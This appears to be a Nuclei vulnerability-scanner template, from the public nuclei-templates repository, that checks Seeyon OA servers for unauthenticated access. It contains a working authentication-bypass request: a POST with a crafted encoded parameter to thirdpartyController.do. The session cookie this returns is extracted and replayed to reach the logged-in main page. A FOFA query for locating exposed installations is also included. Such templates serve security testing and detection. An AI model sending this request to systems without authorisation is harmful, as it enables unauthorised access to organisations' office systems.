nuclei-templates/http/misconfiguration/seeyon-unauth.yaml

56 lines
1.7 KiB
YAML

id: seeyon-unauth
info:
name: Seeyon Unauthoried Access
author: pikpikcu
severity: high
reference:
- https://mp.weixin.qq.com/s/0AqdfTrZUVrwTMbKEKresg
- https://github.com/chaitin/xray/blob/f90cf321bc4d294bbf6625a9c4853f3bfdf0a384/pocs/seeyon-oa-cookie-leak.yml
metadata:
verified: true
max-request: 2
fofa-query: app="致远互联-OA"
tags: misconfig,seeyon,unauth
http:
- raw:
- |
POST /seeyon/thirdpartyController.do HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: deflate
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4
- |
GET /seeyon/main.do HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
Cookie: {{session}}
extractors:
- type: regex
name: session
part: header
internal: true
regex:
- 'JSESSIONID=(.*)'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "当前已登录了一个用户,同一窗口中不能登录多个用户"
- "<a href='/seeyon/main.do?method=logout'"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100faaf5a5b36a43d2c88475e93ad0273fb408b329815bd7af47948b21edaa1986a0221009a41637712d12f4e5ccb09512e5b5202660f10bf63ed92d5b99ce88697af4614:922c64590222798bb761d5b6d8e72950